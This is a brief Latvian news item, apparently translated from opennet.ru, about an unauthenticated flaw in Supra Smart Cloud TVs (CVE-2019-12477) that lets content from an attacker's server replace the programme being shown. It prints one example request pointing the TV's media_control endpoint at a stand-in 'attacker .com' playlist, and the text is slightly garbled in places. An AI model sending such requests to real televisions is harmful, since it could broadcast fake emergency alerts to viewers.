Supra Smart Cloud televizoros Ievainojamība (CVE-2019-12477), kas ļauj aizstāt pašlaik skatīto programmu ar uzbrucēja saturu. Kā piemērs tiek demonstrēta fiktīva brīdinājuma par ārkārtas situāciju izvade.
Uzbrukumam pietiek nosūtīt speciāli izstrādātu tīkla pieprasījumu, kuram nav nepieciešama autentifikācija. Jo īpaši varat izsaukt apdarinātāju "/remote/media_control?action=setUri&uri=", norādot m3u8 faila URL ar video parametriem, piemēram, "http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8".
Vairumā gadījumu piekļuve televizora IP adresei ir ierobežota ar iekšējo tīklu, taču, tā kā pieprasījums tiek nosūtīts, izmantojot HTTP, ir iespējams izmantot metodes, lai piekļūtu iekšējiem resursiem, kad lietotājs atver īpaši izstrādātu ārējo lapu (piem. , aizbildinoties ar attēla pieprasīšanu vai metodes izmantošanu ).
Avots: opennet.ru